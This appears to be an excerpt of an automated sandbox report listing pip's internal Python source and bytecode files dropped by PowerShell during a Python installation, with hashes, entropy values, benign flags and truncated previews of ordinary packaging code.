                                                                                                                                                                                                              Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_pep517(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building wheel for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. wheel_name = backend.build_wheel(. tempd,. metadata_directory=metadata_directory,. ). except Exception:. logger.error("Failed building wheel for
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1417
                                                                                                                                                                                                              Entropy (8bit):4.3101463528891335
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:tmdp9vaPCXvF6jWqat2drOXzP7/P66R2lvFIBNDcPzsdFjyEhL:C9vHXvgjI2dKXruXlva3DssdF2EhL
                                                                                                                                                                                                              MD5:D481FB9C7608F878A84FB81A8A7AA2D1
                                                                                                                                                                                                              SHA1:1D8E256134A57F9C5FA78BB388B31B61D2D0C3CE
                                                                                                                                                                                                              SHA-256:C8EB681FACE9024A0A60452DAFC161CEB62790D1D0690063590D8761A7B53108
                                                                                                                                                                                                              SHA-512:6DFC8DD2DDBDA76D94096930883688E83D50904173BFD1F6AB4F7EC3A4BA026B879059AD5443884F558C537234D38E22D43917DF406BB072B9C2898F0D12D859
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller, HookMissing..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_editable(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Destination directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building editable for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. try:. wheel_name = backend.build_editable(. tempd,. metadata_directory=metadata_directory,. ). exc
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3064
                                                                                                                                                                                                              Entropy (8bit):4.513661919781371
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:PB2BMxxA1CiycvkJAWlQprspdzSCgGZnhqaLd8VsgS2QVMaGrXbF4+g9:PB2BT6JAWyprudz+GZnwOd8igS2QSFVS
                                                                                                                                                                                                              MD5:3A5B36046CFE14561424A5E1EFB50CBB
                                                                                                                                                                                                              SHA1:30C3511EBD59DC05391D5239455C12D74E697BC0
                                                                                                                                                                                                              SHA-256:0BD8FAAEE920408D67FC97902E8646B8375F530CC25D287221D3D3A7A79D6CC4
                                                                                                                                                                                                              SHA-512:BF8AC3322DFFD7B07975E05FF212345F240325204B7A87D55CBB0AEACA7BEA38DB68BB9EFC3330C807B73677FA5B9C0AE17795E2C448CF590439F252DC0E84AA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import logging.import os.path.from typing import List, Optional..from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.setuptools_build import make_setuptools_bdist_wheel_args.from pip._internal.utils.subprocess import call_subprocess, format_command_args..logger = logging.getLogger(__name__)...def format_command_result(. command_args: List[str],. command_output: str,.) -> str:. """Format command information for logging.""". command_desc = format_command_args(command_args). text = f"Command arguments: {command_desc}\n".. if not command_output:. text += "Command output: None". elif logger.getEffectiveLevel() > logging.DEBUG:. text += "Command output: [use --verbose to show]". else:. if not command_output.endswith("\n"):. command_output += "\n". text += f"Command output:\n{command_output}".. return text...def get_legacy_build_wheel_path(. names: List[str],. temp_dir: str,. name: str,. com
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):6806
                                                                                                                                                                                                              Entropy (8bit):4.482733839291248
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:kWH42xp5561FL56bMEHANrxR66YyvtsXS3y5PLEuLDMqaj7/ADyRWNQTJhDxE:kWNxFMFFQMrPyyvipi/AAWNQFtS
                                                                                                                                                                                                              MD5:F2F39E7FF5671C534F4F335E773B9C5A
                                                                                                                                                                                                              SHA1:D97AC05828EE730EE5B14A6F6E28DCE98A4F0B96
                                                                                                                                                                                                              SHA-256:7ECA80F3C8866AA7ED0ABDAD94FDEC494DB4D824A4A0E0D1B56D0EF8953D3386
                                                                                                                                                                                                              SHA-512:F0BC7552E171ED2963A7B12F55E6652CF334B3FF27E57810737A73909174B58D99B216D1D9C3DE92619F6A7F08A9F59B0FFDAD1300192272B6AA7732005E66B5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Validation of dependencies of packages."""..import logging.from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class PackageDetails(NamedTuple):. version: DistributionVersion. dependencies: List[Requirement]...# Shorthands.PackageSet = Dict[NormalizedName, PackageDetails].Missing = Tuple[NormalizedName, Requirement].Conflicting = Tuple[NormalizedName, Distri
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):9816
                                                                                                                                                                                                              Entropy (8bit):4.064319785232956
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wKXwcXVX29FLZPq1gaFYD8uDMNBrVbFhZ0DID53hC/rP3Wf3WFcdbvRMuPV:wKnIMev8ue2/rueFcdlh
                                                                                                                                                                                                              MD5:7DD939A42B1612389F3D939F07D813B7
                                                                                                                                                                                                              SHA1:BFC4FAB55E20829097432E39193CDC13C99A3D10
                                                                                                                                                                                                              SHA-256:BAAA1E4C07FA1CE615311D948004FC37CE54668184544A1075A9FF028E9239F9
                                                                                                                                                                                                              SHA-512:33F913AD806204AB63A5DD080A708B24362A0ED74A9958A0357A1BC505A9BA9EA4FB1497BDE8370AB12DD8AE9B64F15642DE91A077F1194485A6CD23CDA6C86E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import collections.import logging.import os.from typing import Container, Dict, Generator, Iterable, List, NamedTuple, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_file import COMMENT_RE.from pip._internal.utils.direct_url_helpers import direct_url_as_pep440_direct_reference..logger = logging.getLogger(__name__)...class _EditableInfo(NamedTuple):. requirement: str. comments: List[str]...def freeze(. requirement: Optional[List[str]] = None,. local_only: bool = False,. user_only: bool = False,. paths: Optional[List[str]] = None,. isolated: bool = False,. exclude_editable: bool = False,. skip: Container[str] = (),.) -> Ge
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):51
                                                                                                                                                                                                              Entropy (8bit):4.155090479515533
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:d/IF7CL5Dv:RI5CLdv
                                                                                                                                                                                                              MD5:C6F771F71FE2E186FB048050F4D2E467
                                                                                                                                                                                                              SHA1:C72C58E6CD7763F27AC8041D54F6390149AFC48E
                                                                                                                                                                                                              SHA-256:997EE1C83D863413B69851A8903437D2BFC65EFED8FCF2DDB71714BF5E387BEB
                                                                                                                                                                                                              SHA-512:A2A8D3F7862E8260EBC53B6670830104DCCD73A6292E1ECEF40379A167BAC510F81A3583C3AFA0EAAF6632BE771DCC54BE22F00330938B42B70B331DC42A9A0F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""For modules related to installing packages..""".
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):283
                                                                                                                                                                                                              Entropy (8bit):5.097480360633831
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:LbaCCAI5CLf/Z6B0Wltqu95/n23d6oAreKAqAImZEqc6IaYleHXlll:naCC5cLp6BvPqg/2ImbsKYjaYkH1ll
                                                                                                                                                                                                              MD5:D5CE77D0F9B9DB4D9E4A697A13F8725F
                                                                                                                                                                                                              SHA1:B39D7F70958A440F0E19B73F806BD533292F2187
                                                                                                                                                                                                              SHA-256:CDAE68BD366B698994B3F85E9E025A241AFA2787D7D641FF8D0192275FEDD5F6
                                                                                                                                                                                                              SHA-512:825880ED48E235F8F679E12F5FC79922747D94247CD59EDCD4407D585F5E9DF178CCC78A1F2A61E154F6474C44782D0AF569297AE9F5B4080DDE691D5E7F5032
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e3...............................d.Z.y.).z,For modules related to installing packages..N)...__doc__........}C:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/install/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1834
                                                                                                                                                                                                              Entropy (8bit):5.6346571894683795
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:/+qkNlXWRZR+0NtpdI1QPEz98Q2mBs8C7CphPtIf:AXGRn+iJkQPEz98oZhC
                                                                                                                                                                                                              MD5:4A43F85D3F3754A2A3AF92B60E980B54
                                                                                                                                                                                                              SHA1:6429A2D6ECDA6445FAFC46C90E8D909C7AE5F5C6
                                                                                                                                                                                                              SHA-256:044DA1BD75F49F6545F926C90C07ED7328C7C626FF1B1620997A25246CF9DE09
                                                                                                                                                                                                              SHA-512:22B97B96A49D44FDF197DE4DDA5666294BB0B8AB70D47F0A6A4437F69C8BB2D22ED1C7FD7C98AA241C54C50A7770643C414DF47EDA3698A6B616EE7FBE0A61A0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e...............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.).z?Legacy editable installation process, i.e. `setup.py develop`.......N)...Optional..Sequence)...BuildEnvironment)...indent_log)...make_setuptools_develop_args)...call_subprocess..global_options..prefix..home..use_user_site..name..setup_py_path..isolated..build_env..unpacked_source_directory..returnc...........................t.........j...................d.|...........t.........|.|.|.|.|.|...........}.t.................5...|.5...t.........|.d.|.............d.d.d...........d.d.d...........y.#.1.s.w...Y.......x.Y.w.#.1.s.w...Y.....y.x.Y.w.).z[Install a package in editable mode. Most arguments are pass-through. to setuptools.. z.Running setup.py develop for %s).r......no_user_configr....r....r....z.python setup.py develop)...command_desc..cwdN)...logger..infor
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):33870
                                                                                                                                                                                                              Entropy (8bit):5.393777289712567
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:1R2WOFlNE/3VJiJuhwT8o2pABLhcyoAe/rsl/d0Vkycqmeg38czQQAl9V8:BOFl6/PiACOIhpo3W1028cc9K
                                                                                                                                                                                                              MD5:7EDF4E801F246D70E8C0204F15D424ED
                                                                                                                                                                                                              SHA1:990B554ED295BE8DA3935360A2D0E5D7860B394E
                                                                                                                                                                                                              SHA-256:0E8FBE3B5B265F4CB3CD05BE8D9E8E060659E1F4439728C1C1A154385179B54F
                                                                                                                                                                                                              SHA-512:08ECEF89EF1B688568AFE718135161CA6DB309B0AF1A55878A08C24560505E29C5540A908EAEE0C0BB152E7C7E3D1370D679EA9E0E5907AC8281E9475DB5CC5C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e.j.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7..d.d.l8m9Z9m:Z:..d.d.l;m<Z<m=Z=..d.d.l>m?Z?m@Z@..d.d.lAmBZBmCZCmDZDmEZE..d.d.lFmGZGmHZHmIZImJZJ..d.d.lKmLZL..e.r.d.d.l.mMZM....G.d...d.eM........ZN..e.j...................eP........ZQ..e d.eR........ZSe$eSeRe%eTeRf.....f.....ZUdId.eRd.eTd.e$eReRf.....f.d...ZVd.eRd.e.eRe.f.....f.d...ZWd.eRd.eXf.d...ZYd.e.d.eXf.d ..ZZd!e5d.e$e.eReRf.....e.eReRf.....f.....f.d"..Z[d#e"eR....d.e!eR....f.d$..Z\d%e.eU....d.e.e$eReReRf.........f.d&..Z]d'eSd(eRd.eRf.d)..Z^d.eRd(eRd.eSf.d*..Z_d+e.e.eR........d,e.eSeSf.....d-e#eS....d.e.eR....d(eRd.e.eU....f.d/..Z`d0e.eReRf.....d.e.eR....f.d1..Za..G.d2..d3........Zb..G.d4..d5........Zc..G.d6..d7e1........Zdd8eRd.d.f.d9
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1282
                                                                                                                                                                                                              Entropy (8bit):4.529425309919988
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:6NXahpouY2vZHVY/vPXIAavFw3pm8MUUKxmml97+ZyICoUC:iXaPXvZ1savi5m8JUNZyrC
                                                                                                                                                                                                              MD5:DCB76A8AD093B7E45F58BE9D79106C59
                                                                                                                                                                                                              SHA1:61A524BDA27C4AB0F2BD898903EE87E51D34F59A
                                                                                                                                                                                                              SHA-256:61E47429A7565F0FD985E0B536D006D6A5481243A04461DCDB7C7E62D196ECD5
                                                                                                                                                                                                              SHA-512:C00A2CF22BBDBEA5D024F1F2181A0D7557675A7B2C28B9DF9D58466E1E36111A6406D9F0D1587FA4D5E5FD07081580DB08D72DC26AA5A8B83709AD3D56EDAE8D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Legacy editable installation process, i.e. `setup.py develop`..""".import logging.from typing import Optional, Sequence..from pip._internal.build_env import BuildEnvironment.from pip._internal.utils.logging import indent_log.from pip._internal.utils.setuptools_build import make_setuptools_develop_args.from pip._internal.utils.subprocess import call_subprocess..logger = logging.getLogger(__name__)...def install_editable(. *,. global_options: Sequence[str],. prefix: Optional[str],. home: Optional[str],. use_user_site: bool,. name: str,. setup_py_path: str,. isolated: bool,. build_env: BuildEnvironment,. unpacked_source_directory: str,.) -> None:. """Install a package in editable mode. Most arguments are pass-through. to setuptools.. """. logger.info("Running setup.py develop for %s", name).. args = make_setuptools_develop_args(. setup_py_path,. global_options=global_options,. no_user_config=isolated,. prefix=pref
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):27311
                                                                                                                                                                                                              Entropy (8bit):4.642708671405098
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:0GHMR/kRyVVi89DzT8O1WCqclVNe3nHCFvtoMWgCq2JTRH:0QI/bPnkVclVNe3H6hE1RH
                                                                                                                                                                                                              MD5:F885BF99952E370232B260C8B3A4A2B0
                                                                                                                                                                                                              SHA1:1CC61594079640CF319031BD5FD0F278ED519D1E
                                                                                                                                                                                                              SHA-256:F6119BD5CE1B4673C86F6146EC2B5448F7CFC6AA6B987401B702009563CD4ED1
                                                                                                                                                                                                              SHA-512:A16709DACFB9BAB959F2537C09B1673332F8A67DA65FF2877401E4768E83B34ABAE4B3E966A65ED1B04E7159B240AC4EFED0832E0300F396FD2F66D5B185D7D0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Support for installing and building the "wheel" binary package format.."""..import collections.import compileall.import contextlib.import csv.import importlib.import logging.import os.path.import re.import shutil.import sys.import warnings.from base64 import urlsafe_b64encode.from email.message import Message.from itertools import chain, filterfalse, starmap.from typing import (. IO,. TYPE_CHECKING,. Any,. BinaryIO,. Callable,. Dict,. Generator,. Iterable,. Iterator,. List,. NewType,. Optional,. Sequence,. Set,. Tuple,. Union,. cast,.).from zipfile import ZipFile, ZipInfo..from pip._vendor.distlib.scripts import ScriptMaker.from pip._vendor.distlib.util import get_export_entry.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_major_minor_version.from pip._internal.metadata import (. BaseDistribution,. FilesystemWheel,. ge
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):28128
                                                                                                                                                                                                              Entropy (8bit):4.3534757921233584
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:6wqVVk3BUI64dQw93NywZO6FK1pbSTB5wqCMrcAr4OVN3h5rgcyxK:sp8QZwZTccaqCM/rJVN3LgcmK
                                                                                                                                                                                                              MD5:D47E3EB660F7DBCAEC2D8BB2BC871B01
                                                                                                                                                                                                              SHA1:DC57A38D370F140ADFB08A5C8EDD2E35FF19EB40
                                                                                                                                                                                                              SHA-256:E7B3AAF3B1DFBA75F745BAA9E3B15D689AFD7076C02949BFDE0BFB5A1040A9B1
                                                                                                                                                                                                              SHA-512:7DF3547C12AB029CA0B7D2CF0FAC89CD65AC3273C347DACD1BE635F24FD690576015C7516326A650076D8A6507DCF0BA0D571598B2920BB4A8336435C847D3CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:"""Prepares a distribution for installation."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import mimetypes.import os.import shutil.from pathlib import Path.from typing import Dict, Iterable, List, Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.distributions.installed import InstalledDistribution.from pip._internal.exceptions import (. DirectoryUrlHashUnsupported,. HashMismatch,. HashUnpinned,. InstallationError,. MetadataInconsistent,. NetworkConnectionError,. VcsHashUnsupported,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_metadata_distribution.from pip._internal.models.direct_url import ArchiveInfo.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.netwo
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):7152
                                                                                                                                                                                                              Entropy (8bit):4.544558175493023
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:qWhBuxc89eeuB3bybJ9dlwdNHyYhf9QGpo5QZOv7Q4IY4LrMn4sNqXj/Qy8uO+ND:qWh5890mLw7ycf91SgE7QsnE/DNiMSg
                                                                                                                                                                                                              MD5:EA947CFEEE9C6ADD3CA6D39E9EFA3C98
                                                                                                                                                                                                              SHA1:E28E26069246AB43190B65A83D9A362D31623D07
                                                                                                                                                                                                              SHA-256:E17B33A75D7182BD76EB2CC6E816C9034A1A43D597BA16F48F251BFB2FFA94F4
                                                                                                                                                                                                              SHA-512:5FCF07C4A901B2D768996D1275E5B680706C6B703F7EE526A0A1EED8660C2E1F0DFC2C1564E19A07663C24F73D983FD43ACCFC3F82E57C6EC0DBB3B427436569
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import importlib.util.import os.from collections import namedtuple.from typing import Any, List, Optional..from pip._vendor import tomli.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement..from pip._internal.exceptions import (. InstallationError,. InvalidPyProjectBuildRequires,. MissingPyProjectBuildRequires,.)...def _is_list_of_str(obj: Any) -> bool:. return isinstance(obj, list) and all(isinstance(item, str) for item in obj)...def make_pyproject_path(unpacked_source_directory: str) -> str:. return os.path.join(unpacked_source_directory, "pyproject.toml")...BuildSystemDetails = namedtuple(. "BuildSystemDetails", ["requires", "backend", "check", "backend_path"].)...def load_pyproject_toml(. use_pep517: Optional[bool], pyproject_toml: str, setup_py: str, req_name: str.) -> Optional[BuildSystemDetails]:. """Load the pyproject.toml file... Parameters:. use_pep517 - Has the user requested PEP 517 processing? None.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2738
                                                                                                                                                                                                              Entropy (8bit):4.326201740902436
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:dovZvw6xtd2ZhedgW+FbOjm+8CdCaksbZsIwZMtTwH8AXdjW:IxD122gW+Fbp+lCaksbpwmTQjW
                                                                                                                                                                                                              MD5:90F6415749AEAC444FDC82A5D4A67413
                                                                                                                                                                                                              SHA1:CF0EAD8F5FB907FC11C71DF8CBA39D7B2A024A1A
                                                                                                                                                                                                              SHA-256:4C42C58193A87F796132668809558BF54ECF9615E8F4EB9FA246CC009E89D862
                                                                                                                                                                                                              SHA-512:B85D577F6023DA280DF94ED9719FB64D804E0665EFC6014F5B3CF223D233966FFB9457A63A5CABE9BB097566314C42F46FB17E5B56F984154965F2A5A0BB6C02
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:import collections.import logging.from typing import Generator, List, Optional, Sequence, Tuple..from pip._internal.utils.logging import indent_log..from .req_file import parse_requirements.from .req_install import InstallRequirement.from .req_set import RequirementSet..__all__ = [. "RequirementSet",. "InstallRequirement",. "parse_requirements",. "install_given_reqs",.]..logger = logging.getLogger(__name__)...class InstallationResult:. def __init__(self, name: str) -> None:. self.name = name.. def __repr__(self) -> str:. return f"InstallationResult(name={self.name!r})"...def _validate_requirements(. requirements: List[InstallRequirement],.) -> Generator[Tuple[str, InstallRequirement], None, None]:. for req in requirements:. assert req.name, f"invalid to-be-installed requirement: {req}". yield req.name, req...def install_given_reqs(. requirements: List[InstallRequirement],. global_options: Sequence[str],. root: Optional[str],.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3758
                                                                                                                                                                                                              Entropy (8bit):5.51951405477851
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:obwq5cBqMHHOcprPd/zfOQqJcbPdzmwDTeZ:oP+BqCvtPKWTi
                                                                                                                                                                                                              MD5:81DBD18E776E3DB535DA43FE0AC9DD68
                                                                                                                                                                                                              SHA1:EB2894E96FC42E4E457C4E7EF8D1B53335162FDE
                                                                                                                                                                                                              SHA-256:28957C36BA8C6035B011A9922EBBD48B9298247C86CDFB35F3E7FA7FBA7678BA
                                                                                                                                                                                                              SHA-512:FB64830126804A507F60ACA522C5FE15D0EA3348C5196B447C00C1D382B0AA5356D7B6A303B871779C2CA05F9700F06DB0AA5686B0F35520F06A4E7F69EBB24B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.e................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...e.j"..................e.........Z...G.d...d.........Z.d.e.e.....d.e.e.e.e.f.....d.d.f.....f.d...Z.d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Generator..List..Optional..Sequence..Tuple)...indent_log.....)...parse_requirements)...InstallRequirement)...RequirementSet).r....r....r......install_given_reqsc.....................(.....e.Z.d.Z.d.e.d.d.f.d...Z.d.e.f.d...Z.y.)...InstallationResult..name..returnNc...........................|.|._.........y.).N..r....)...selfr....s.... .nC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/req/__init__.py..__init__z.InstallationResult.__init__....s..................c.....................".....d.|.j.....................d...S.).Nz.InstallationResult(name=..)r....).r....s.... r......__repr__z.InstallationResult.__rep
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21598
                                                                                                                                                                                                              Entropy (8bit):5.437251575854725
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:dt86OlvUlRfRNE2Eg/zJCG3da2kpQK3FZhYuQBnEsyuP/IuZpk:dt8LlvUjfRNEYzYIkpQaYuKEsNZZpk
                                                                                                                                                                                                              MD5:2A97831A27A0A6709CEF79BB9F6C066F
                                                                                                                                                                                                              SHA1:050D277E8B68CC34B281F1C322BC84C9219866FC
                                                                                                                                                                                                              SHA-256:55825F164F2D5A0009F1230A604A2FDF1C5EEC103F7FA3D747E4DABB28807963
                                                                                                                                                                                                              SHA-512:0EC37F63EE8E26E88D2F219C784762062E8831849E100F75E972DD60572731CD0B0341058A2133028AB6DCB6704295D53CE1C53FBFB27D064F485303CFAE5717
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.........j.eJJ........................x.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"..d.d.l#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..d.d.l)m*Z*m+Z+..g.d...Z,..e.jZ..................e.........Z/e.j`..................jc..........................Z2d.e3d.e.e3e.e3....f.....f.d...Z4d.e.e3....d.e.e3....f.d...Z5d.e.d.e.e3....d.e.f.d...Z6d.e3d.e.e.e3....e3e.e3....f.....f.d...Z7d.e3d.d.f.d...Z8d.e3d.e3f.d...Z9..G.d ..d!........Z:d.e3d.e:f.d"..Z;..d?d.d#d.d.d#d#d#d.d$..d.e3d%e.e.e e3f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d+e<d,e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d...Z=d/e3d.e<f.d0..Z>d.e3d/e3d.e.e3....f.d1..Z?d/e3d2e.e3....d.e:f.d3..Z@..d?d.d#d.d.d#d.d#d.d4..d/e3d%e.e.e3e f.........d&e.e<....d'e<d(e.e.e3........d)e.e.e3e.e3....f.........d*e<d2e.e3....d+e<d-e.e.e3e.e3e.e3....f.....f.........d.e f.d5..ZA........d@d6
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):21469
                                                                                                                                                                                                              Entropy (8bit):5.453520479685973
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LPtzl3ZckffNRknwp3k/TXzKJgwV6/Z9ADSbJ0t/okqfDO:7tzVZ/L9JWTXzug5Z9Nmt/ofK
